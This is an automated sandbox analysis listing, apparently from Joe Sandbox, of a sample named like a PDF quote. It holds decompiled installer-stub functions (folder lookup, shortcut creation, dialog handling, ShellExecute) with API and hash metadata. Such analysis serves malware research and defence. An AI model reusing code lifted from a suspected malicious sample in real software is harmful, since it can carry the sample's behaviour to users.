                					_t39 =  *(_t73 + 1);
                					_t74 =  *_t73;
                					_a8 = _a8 + 2;
                					_v20 = _t39;
                					_t93 = (_t39 & 0x0000007f) << 0x00000007 | _t74 & 0x0000007f;
                					_t68 = _t74;
                					_t40 = _t39 | 0x00000080;
                					__eflags = _t81 - 0xfe;
                					_v28 = _t68;
                					_v24 = _t74 | 0x00000080;
                					_v16 = _t40;
                					if(_t81 != 0xfe) {
                						__eflags = _t81 - 0xfd;
                						if(_t81 != 0xfd) {
                							__eflags = _t81 - 0xff;
                							if(_t81 == 0xff) {
                								__eflags = (_t40 | 0xffffffff) - _t93;
                								E00405AA7(_t68, _t84, _t93, _t84, (_t40 | 0xffffffff) - _t93);
                							}
                							L41:
                							_t41 = lstrlenA(_t84);
                							_t73 = _a8;
                							_t84 =  &(_t84[_t41]);
                							_t37 = 0x422e40;
                							continue;
                						}
                						__eflags = _t93 - 0x1d;
                						if(_t93 != 0x1d) {
                							__eflags = (_t93 << 0xa) + 0x424000;
                							E00405A85(_t84, (_t93 << 0xa) + 0x424000);
                						} else {
                							E004059E3(_t84,  *0x423ea8);
                						}
                						__eflags = _t93 + 0xffffffeb - 7;
                						if(_t93 + 0xffffffeb < 7) {
                							L32:
                							E00405CE3(_t84);
                						}
                						goto L41;
                					}
                					_t95 = 2;
                					_t51 = GetVersion();
                					__eflags = _t51;
                					if(_t51 >= 0) {
                						L12:
                						_v8 = 1;
                						L13:
                						__eflags =  *0x423f24;
                						if( *0x423f24 != 0) {
                							_t95 = 4;
                						}
                						__eflags = _t68;
                						if(_t68 >= 0) {
                							__eflags = _t68 - 0x25;
                							if(_t68 != 0x25) {
                								__eflags = _t68 - 0x24;
                								if(_t68 == 0x24) {
                									GetWindowsDirectoryA(_t84, 0x400);
                									_t95 = 0;
                								}
                								while(1) {
                									__eflags = _t95;
                									if(_t95 == 0) {
                										goto L29;
                									}
                									_t52 =  *0x423ea4;
                									_t95 = _t95 - 1;
                									__eflags = _t52;
                									if(_t52 == 0) {
                										L25:
                										_t54 = SHGetSpecialFolderLocation( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18),  &_v12);
                										__eflags = _t54;
                										if(_t54 != 0) {
                											L27:
                											 *_t84 =  *_t84 & 0x00000000;
                											__eflags =  *_t84;
                											continue;
                										}
                										__imp__SHGetPathFromIDListA(_v12, _t84);
                										__imp__CoTaskMemFree(_v12);
                										__eflags = _t54;
                										if(_t54 != 0) {
                											goto L29;
                										}
                										goto L27;
                									}
                									__eflags = _v8;
                									if(_v8 == 0) {
                										goto L25;
                									}
                									_t56 =  *_t52( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18), 0, 0, _t84);
                									__eflags = _t56;
                									if(_t56 == 0) {
                										goto L29;
                									}
                									goto L25;
                								}
                								goto L29;
                							}
                							GetSystemDirectoryA(_t84, 0x400);
                							goto L29;
                						} else {
                							_t71 = (_t68 & 0x0000003f) +  *0x423ed8;
                							E0040596C(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t68 & 0x0000003f) +  *0x423ed8, _t84, _t68 & 0x00000040);
                							__eflags =  *_t84;
                							if( *_t84 != 0) {
                								L30:
                								__eflags = _v20 - 0x1a;
                								if(_v20 == 0x1a) {
                									lstrcatA(_t84, "\\Microsoft\\Internet Explorer\\Quick Launch");
                								}
                								goto L32;
                							}
                							E00405AA7(_t71, _t84, _t95, _t84, _v20);
                							L29:
                							__eflags =  *_t84;
                							if( *_t84 == 0) {
                								goto L32;
                							}
                							goto L30;
                						}
                					}
                					__eflags = _t51 - 0x5a04;
                					if(_t51 == 0x5a04) {
                						goto L12;
                					}
                					__eflags = _v20 - 0x23;
                					if(_v20 == 0x23) {
                						goto L12;
                					}
                					__eflags = _v20 - 0x2e;
                					if(_v20 == 0x2e) {
                						goto L12;
                					} else {
                						_v8 = _v8 & 0x00000000;
                						goto L13;
                					}
                				}
                				 *_t84 =  *_t84 & 0x00000000;
                				if(_a4 == 0) {
                					return _t37;
                				}
                				return E00405A85(_a4, _t37);
                			}

                APIs
                • GetVersion.KERNEL32(?,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405B4B
                • GetSystemDirectoryA.KERNEL32 ref: 00405BC6
                • GetWindowsDirectoryA.KERNEL32(afqfmqnwor,00000400), ref: 00405BD9
                • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405C15
                • SHGetPathFromIDListA.SHELL32(00000000,afqfmqnwor), ref: 00405C23
                • CoTaskMemFree.OLE32(00000000), ref: 00405C2E
                • lstrcatA.KERNEL32(afqfmqnwor,\Microsoft\Internet Explorer\Quick Launch), ref: 00405C50
                • lstrlenA.KERNEL32(afqfmqnwor,?,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405CA2
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$afqfmqnwor
                • API String ID: 900638850-4158592220
                • Opcode ID: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
                • Instruction ID: 02e69832ec688910c0edf1e4f77165a8fa6b6d990b95ba5e8d1c2d1c59892890
                • Opcode Fuzzy Hash: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
                • Instruction Fuzzy Hash: B251E371A08B19ABEB215B64CC84BBF3B74EB15714F14023BE911BA2D0D37C5982DE4E
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 74%
                			E00402012() {
                				void* _t44;
                				intOrPtr* _t48;
                				intOrPtr* _t50;
                				intOrPtr* _t52;
                				intOrPtr* _t54;
                				signed int _t58;
                				intOrPtr* _t59;
                				intOrPtr* _t62;
                				intOrPtr* _t64;
                				intOrPtr* _t66;
                				intOrPtr* _t69;
                				intOrPtr* _t71;
                				int _t75;
                				signed int _t81;
                				intOrPtr* _t88;
                				void* _t95;
                				void* _t96;
                				void* _t100;
                
                				 *(_t100 - 0x30) = E004029E8(0xfffffff0);
                				_t96 = E004029E8(0xffffffdf);
                				 *((intOrPtr*)(_t100 - 0x2c)) = E004029E8(2);
                				 *((intOrPtr*)(_t100 - 8)) = E004029E8(0xffffffcd);
                				 *((intOrPtr*)(_t100 - 0x44)) = E004029E8(0x45);
                				if(E004055E5(_t96) == 0) {
                					E004029E8(0x21);
                				}
                				_t44 = _t100 + 8;
                				__imp__CoCreateInstance(0x407384, _t75, 1, 0x407374, _t44);
                				if(_t44 < _t75) {
                					L13:
                					 *((intOrPtr*)(_t100 - 4)) = 1;
                					_push(0xfffffff0);
                				} else {
                					_t48 =  *((intOrPtr*)(_t100 + 8));
                					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407394, _t100 - 0x34);
                					if(_t95 >= _t75) {
                						_t52 =  *((intOrPtr*)(_t100 + 8));
                						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
                						_t54 =  *((intOrPtr*)(_t100 + 8));
                						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\hardz\\AppData\\Local\\Temp");
                						_t81 =  *(_t100 - 0x14);
                						_t58 = _t81 >> 0x00000008 & 0x000000ff;
                						if(_t58 != 0) {
                							_t88 =  *((intOrPtr*)(_t100 + 8));
                							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
                							_t81 =  *(_t100 - 0x14);
                						}
                						_t59 =  *((intOrPtr*)(_t100 + 8));
                						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
                						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
                							_t71 =  *((intOrPtr*)(_t100 + 8));
                							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
                						}
                						_t62 =  *((intOrPtr*)(_t100 + 8));
                						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
                						_t64 =  *((intOrPtr*)(_t100 + 8));
                						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
                						if(_t95 >= _t75) {
                							_t95 = 0x80004005;
                							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409360, 0x400) != 0) {
                								_t69 =  *((intOrPtr*)(_t100 - 0x34));
                								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409360, 1);
                							}
                						}
                						_t66 =  *((intOrPtr*)(_t100 - 0x34));
                						 *((intOrPtr*)( *_t66 + 8))(_t66);
                					}
                					_t50 =  *((intOrPtr*)(_t100 + 8));
                					 *((intOrPtr*)( *_t50 + 8))(_t50);
                					if(_t95 >= _t75) {
                						_push(0xfffffff4);
                					} else {
                						goto L13;
                					}
                				}
                				E00401423();
                				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t100 - 4));
                				return 0;
                			}

                APIs
                • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402065
                • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409360,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040211F
                Strings
                • C:\Users\user\AppData\Local\Temp, xrefs: 0040209D
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: ByteCharCreateInstanceMultiWide
                • String ID: C:\Users\user\AppData\Local\Temp
                • API String ID: 123533781-501415292
                • Opcode ID: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
                • Instruction ID: 9a85de16ea5d7a81ede148d9b78cdb1ba9a910f30d2aff7a9c0f788a9809de35
                • Opcode Fuzzy Hash: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
                • Instruction Fuzzy Hash: 0E414DB5A00104AFDB00DFA4CD89E9E7BBABF49314B20416AF905EB2D1DA79DD41CB64
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 39%
                			E00402630(char __ebx, char* __edi, char* __esi) {
                				void* _t19;
                
                				if(FindFirstFileA(E004029E8(2), _t19 - 0x1a4) != 0xffffffff) {
                					E004059E3(__edi, _t6);
                					_push(_t19 - 0x178);
                					_push(__esi);
                					E00405A85();
                				} else {
                					 *__edi = __ebx;
                					 *__esi = __ebx;
                					 *((intOrPtr*)(_t19 - 4)) = 1;
                				}
                				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t19 - 4));
                				return 0;
                			}





                APIs
                • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040263F
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: FileFindFirst
                • String ID:
                • API String ID: 1974802433-0
                • Opcode ID: e252be4d8dac41554fd361ab132364df58656f291f34e3e62bfafec942fe1f51
                • Instruction ID: 76eef0906e3fa6c86cf2ebea0eb1ad5f879b60bc34498b8afccad509cb3c3919
                • Opcode Fuzzy Hash: e252be4d8dac41554fd361ab132364df58656f291f34e3e62bfafec942fe1f51
                • Instruction Fuzzy Hash: 67F0A772A04100EED700EBB59D49EFE7778DF11324F6005BBE111B20C1C7B889419A2A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 83%
                			E00403964(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                				struct HWND__* _v32;
                				void* _v84;
                				void* _v88;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				signed int _t35;
                				signed int _t37;
                				signed int _t39;
                				struct HWND__* _t49;
                				signed int _t67;
                				struct HWND__* _t73;
                				signed int _t86;
                				struct HWND__* _t91;
                				signed int _t99;
                				int _t103;
                				signed int _t115;
                				signed int _t116;
                				int _t117;
                				signed int _t122;
                				struct HWND__* _t125;
                				struct HWND__* _t126;
                				int _t127;
                				long _t130;
                				int _t132;
                				int _t133;
                				void* _t134;
                
                				_t115 = _a8;
                				if(_t115 == 0x110 || _t115 == 0x408) {
                					_t35 = _a12;
                					_t125 = _a4;
                					__eflags = _t115 - 0x110;
                					 *0x42047c = _t35;
                					if(_t115 == 0x110) {
                						 *0x423ea8 = _t125;
                						 *0x420490 = GetDlgItem(_t125, 1);
                						_t91 = GetDlgItem(_t125, 2);
                						_push(0xffffffff);
                						_push(0x1c);
                						 *0x41f458 = _t91;
                						E00403E37(_t125);
                						SetClassLongA(_t125, 0xfffffff2,  *0x423688);
                						 *0x42366c = E0040140B(4);
                						_t35 = 1;
                						__eflags = 1;
                						 *0x42047c = 1;
                					}
                					_t122 =  *0x4091bc; // 0xffffffff
                					_t133 = 0;
                					_t130 = (_t122 << 6) +  *0x423ec0;
                					__eflags = _t122;
                					if(_t122 < 0) {
                						L34:
                						E00403E83(0x40b);
                						while(1) {
                							_t37 =  *0x42047c;
                							 *0x4091bc =  *0x4091bc + _t37;
                							_t130 = _t130 + (_t37 << 6);
                							_t39 =  *0x4091bc; // 0xffffffff
                							__eflags = _t39 -  *0x423ec4;
                							if(_t39 ==  *0x423ec4) {
                								E0040140B(1);
                							}
                							__eflags =  *0x42366c - _t133;
                							if( *0x42366c != _t133) {
                								break;
                							}
                							__eflags =  *0x4091bc -  *0x423ec4; // 0xffffffff
                							if(__eflags >= 0) {
                								break;
                							}
                							_t116 =  *(_t130 + 0x14);
                							E00405AA7(_t116, _t125, _t130, 0x42b800,  *((intOrPtr*)(_t130 + 0x24)));
                							_push( *((intOrPtr*)(_t130 + 0x20)));
                							_push(0xfffffc19);
                							E00403E37(_t125);
                							_push( *((intOrPtr*)(_t130 + 0x1c)));
                							_push(0xfffffc1b);
                							E00403E37(_t125);
                							_push( *((intOrPtr*)(_t130 + 0x28)));
                							_push(0xfffffc1a);
                							E00403E37(_t125);
                							_t49 = GetDlgItem(_t125, 3);
                							__eflags =  *0x423f2c - _t133;
                							_v32 = _t49;
                							if( *0x423f2c != _t133) {
                								_t116 = _t116 & 0x0000fefd | 0x00000004;
                								__eflags = _t116;
                							}
                							ShowWindow(_t49, _t116 & 0x00000008);
                							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
                							E00403E59(_t116 & 0x00000002);
                							_t117 = _t116 & 0x00000004;
                							EnableWindow( *0x41f458, _t117);
                							__eflags = _t117 - _t133;
                							if(_t117 == _t133) {
                								_push(1);
                							} else {
                								_push(_t133);
                							}
                							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
                							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
                							__eflags =  *0x423f2c - _t133;
                							if( *0x423f2c == _t133) {
                								_push( *0x420490);
                							} else {
                								SendMessageA(_t125, 0x401, 2, _t133);
                								_push( *0x41f458);
                							}
                							E00403E6C();
                							E00405A85(0x420498, 0x4236a0);
                							E00405AA7(0x420498, _t125, _t130,  &(0x420498[lstrlenA(0x420498)]),  *((intOrPtr*)(_t130 + 0x18)));
                							SetWindowTextA(_t125, 0x420498);
                							_push(_t133);
                							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
                							__eflags = _t67;
                							if(_t67 != 0) {
                								continue;
                							} else {
                								__eflags =  *_t130 - _t133;
                								if( *_t130 == _t133) {
                									continue;
                								}
                								__eflags =  *(_t130 + 4) - 5;
                								if( *(_t130 + 4) != 5) {
                									DestroyWindow( *0x423678);
                									 *0x41fc68 = _t130;
                									__eflags =  *_t130 - _t133;
                									if( *_t130 <= _t133) {
                										goto L58;
                									}
                									_t73 = CreateDialogParamA( *0x423ea0,  *_t130 +  *0x423680 & 0x0000ffff, _t125,  *(0x4091c0 +  *(_t130 + 4) * 4), _t130);
                									__eflags = _t73 - _t133;
                									 *0x423678 = _t73;
                									if(_t73 == _t133) {
                										goto L58;
                									}
                									_push( *((intOrPtr*)(_t130 + 0x2c)));
                									_push(6);
                									E00403E37(_t73);
                									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
                									ScreenToClient(_t125, _t134 + 0x10);
                									SetWindowPos( *0x423678, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
                									_push(_t133);
                									E00401389( *((intOrPtr*)(_t130 + 0xc)));
                									__eflags =  *0x42366c - _t133;
                									if( *0x42366c != _t133) {
                										goto L61;
                									}
                									ShowWindow( *0x423678, 8);
                									E00403E83(0x405);
                									goto L58;
                								}
                								__eflags =  *0x423f2c - _t133;
                								if( *0x423f2c != _t133) {
                									goto L61;
                								}
                								__eflags =  *0x423f20 - _t133;
                								if( *0x423f20 != _t133) {
                									continue;
                								}
                								goto L61;
                							}
                						}
                						DestroyWindow( *0x423678);
                						 *0x423ea8 = _t133;
                						EndDialog(_t125,  *0x41f860);
                						goto L58;
                					} else {
                						__eflags = _t35 - 1;
                						if(_t35 != 1) {
                							L33:
                							__eflags =  *_t130 - _t133;
                							if( *_t130 == _t133) {
                								goto L61;
                							}
                							goto L34;
                						}
                						_push(0);
                						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
                						__eflags = _t86;
                						if(_t86 == 0) {
                							goto L33;
                						}
                						SendMessageA( *0x423678, 0x40f, 0, 1);
                						__eflags =  *0x42366c;
                						return 0 |  *0x42366c == 0x00000000;
                					}
                				} else {
                					_t125 = _a4;
                					_t133 = 0;
                					if(_t115 == 0x47) {
                						SetWindowPos( *0x420470, _t125, 0, 0, 0, 0, 0x13);
                					}
                					if(_t115 == 5) {
                						asm("sbb eax, eax");
                						ShowWindow( *0x420470,  ~(_a12 - 1) & _t115);
                					}
                					if(_t115 != 0x40d) {
                						__eflags = _t115 - 0x11;
                						if(_t115 != 0x11) {
                							__eflags = _t115 - 0x111;
                							if(_t115 != 0x111) {
                								L26:
                								return E00403E9E(_t115, _a12, _a16);
                							}
                							_t132 = _a12 & 0x0000ffff;
                							_t126 = GetDlgItem(_t125, _t132);
                							__eflags = _t126 - _t133;
                							if(_t126 == _t133) {
                								L13:
                								__eflags = _t132 - 1;
                								if(_t132 != 1) {
                									__eflags = _t132 - 3;
                									if(_t132 != 3) {
                										_t127 = 2;
                										__eflags = _t132 - _t127;
                										if(_t132 != _t127) {
                											L25:
                											SendMessageA( *0x423678, 0x111, _a12, _a16);
                											goto L26;
                										}
                										__eflags =  *0x423f2c - _t133;
                										if( *0x423f2c == _t133) {
                											_t99 = E0040140B(3);
                											__eflags = _t99;
                											if(_t99 != 0) {
                												goto L26;
                											}
                											 *0x41f860 = 1;
                											L21:
                											_push(0x78);
                											L22:
                											E00403E10();
                											goto L26;
                										}
                										E0040140B(_t127);
                										 *0x41f860 = _t127;
                										goto L21;
                									}
                									__eflags =  *0x4091bc - _t133; // 0xffffffff
                									if(__eflags <= 0) {
                										goto L25;
                									}
                									_push(0xffffffff);
                									goto L22;
                								}
                								_push(_t132);
                								goto L22;
                							}
                							SendMessageA(_t126, 0xf3, _t133, _t133);
                							_t103 = IsWindowEnabled(_t126);
                							__eflags = _t103;
                							if(_t103 == 0) {
                								goto L61;
                							}
                							goto L13;
                						}
                						SetWindowLongA(_t125, _t133, _t133);
                						return 1;
                					} else {
                						DestroyWindow( *0x423678);
                						 *0x423678 = _a12;
                						L58:
                						if( *0x421498 == _t133 &&  *0x423678 != _t133) {
                							ShowWindow(_t125, 0xa);
                							 *0x421498 = 1;
                						}
                						L61:
                						return 0;
                					}
                				}
                			}































                APIs
                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039A0
                • ShowWindow.USER32(?), ref: 004039BD
                • DestroyWindow.USER32 ref: 004039D1
                • SetWindowLongA.USER32(?,00000000,00000000), ref: 004039ED
                • GetDlgItem.USER32 ref: 00403A0E
                • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A22
                • IsWindowEnabled.USER32(00000000), ref: 00403A29
                • GetDlgItem.USER32 ref: 00403AD7
                • GetDlgItem.USER32 ref: 00403AE1
                • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403AFB
                • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B4C
                • GetDlgItem.USER32 ref: 00403BF2
                • ShowWindow.USER32(00000000,?), ref: 00403C13
                • EnableWindow.USER32(?,?), ref: 00403C25
                • EnableWindow.USER32(?,?), ref: 00403C40
                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C56
                • EnableMenuItem.USER32 ref: 00403C5D
                • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403C75
                • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403C88
                • lstrlenA.KERNEL32(00420498,?,00420498,004236A0), ref: 00403CB1
                • SetWindowTextA.USER32(?,00420498), ref: 00403CC0
                • ShowWindow.USER32(?,0000000A), ref: 00403DF4
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                • String ID:
                • API String ID: 184305955-0
                • Opcode ID: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
                • Instruction ID: caafd2a66b76c4ae3962cc82e2ded254e31ce9ec1c8840106f3b43a2641cb278
                • Opcode Fuzzy Hash: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
                • Instruction Fuzzy Hash: 95C1AF71A04204BBDB206F21ED85E2B7E7CEB05706F40453EF641B12E1C779AA429F6E
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 93%
                			E00403F7F(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                				char _v8;
                				signed int _v12;
                				void* _v16;
                				struct HWND__* _t52;
                				long _t86;
                				int _t98;
                				struct HWND__* _t99;
                				signed int _t100;
                				intOrPtr _t103;
                				intOrPtr _t109;
                				int _t110;
                				signed int* _t112;
                				signed int _t113;
                				char* _t114;
                				CHAR* _t115;
                
                				if(_a8 != 0x110) {
                					if(_a8 != 0x111) {
                						L11:
                						if(_a8 != 0x4e) {
                							if(_a8 == 0x40b) {
                								 *0x420478 =  *0x420478 + 1;
                							}
                							L25:
                							_t110 = _a16;
                							L26:
                							return E00403E9E(_a8, _a12, _t110);
                						}
                						_t52 = GetDlgItem(_a4, 0x3e8);
                						_t110 = _a16;
                						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                							_t109 =  *((intOrPtr*)(_t110 + 0x18));
                							_v12 = _t100;
                							_v16 = _t109;
                							_v8 = 0x422e40;
                							if(_t100 - _t109 < 0x800) {
                								SendMessageA(_t52, 0x44b, 0,  &_v16);
                								SetCursor(LoadCursorA(0, 0x7f02));
                								_t40 =  &_v8; // 0x422e40
                								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
                								SetCursor(LoadCursorA(0, 0x7f00));
                								_t110 = _a16;
                							}
                						}
                						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                							goto L26;
                						} else {
                							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                								SendMessageA( *0x423ea8, 0x111, 1, 0);
                							}
                							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                								SendMessageA( *0x423ea8, 0x10, 0, 0);
                							}
                							return 1;
                						}
                					}
                					if(_a12 >> 0x10 != 0 ||  *0x420478 != 0) {
                						goto L25;
                					} else {
                						_t103 =  *0x41fc68; // 0x0
                						_t25 = _t103 + 0x14; // 0x14
                						_t112 = _t25;
                						if(( *_t112 & 0x00000020) == 0) {
                							goto L25;
                						}
                						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                						E00403E59(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                						E0040420A();
                						goto L11;
                					}
                				}
                				_t98 = _a16;
                				_t113 =  *(_t98 + 0x30);
                				if(_t113 < 0) {
                					_t113 =  *( *0x42367c - 4 + _t113 * 4);
                				}
                				_push( *((intOrPtr*)(_t98 + 0x34)));
                				_t114 = _t113 +  *0x423ed8;
                				_push(0x22);
                				_a16 =  *_t114;
                				_v12 = _v12 & 0x00000000;
                				_t115 = _t114 + 1;
                				_v16 = _t115;
                				_v8 = E00403F4B;
                				E00403E37(_a4);
                				_push( *((intOrPtr*)(_t98 + 0x38)));
                				_push(0x23);
                				E00403E37(_a4);
                				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                				E00403E59( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                				_t99 = GetDlgItem(_a4, 0x3e8);
                				E00403E6C(_t99);
                				SendMessageA(_t99, 0x45b, 1, 0);
                				_t86 =  *( *0x423eb0 + 0x68);
                				if(_t86 < 0) {
                					_t86 = GetSysColor( ~_t86);
                				}
                				SendMessageA(_t99, 0x443, 0, _t86);
                				SendMessageA(_t99, 0x445, 0, 0x4010000);
                				 *0x41f45c =  *0x41f45c & 0x00000000;
                				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                				SendMessageA(_t99, 0x449, _a16,  &_v16);
                				 *0x420478 =  *0x420478 & 0x00000000;
                				return 0;
                			}

                APIs
                • CheckDlgButton.USER32 ref: 0040400A
                • GetDlgItem.USER32 ref: 0040401E
                • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040403C
                • GetSysColor.USER32(?), ref: 0040404D
                • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040405C
                • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040406B
                • lstrlenA.KERNEL32(?), ref: 00404075
                • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404083
                • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404092
                • GetDlgItem.USER32 ref: 004040F5
                • SendMessageA.USER32(00000000), ref: 004040F8
                • GetDlgItem.USER32 ref: 00404123
                • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404163
                • LoadCursorA.USER32 ref: 00404172
                • SetCursor.USER32(00000000), ref: 0040417B
                • ShellExecuteA.SHELL32(0000070B,open,@.B,00000000,00000000,00000001), ref: 0040418E
                • LoadCursorA.USER32 ref: 0040419B
                • SetCursor.USER32(00000000), ref: 0040419E
                • SendMessageA.USER32(00000111,00000001,00000000), ref: 004041CA
                • SendMessageA.USER32(00000010,00000000,00000000), ref: 004041DE
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp
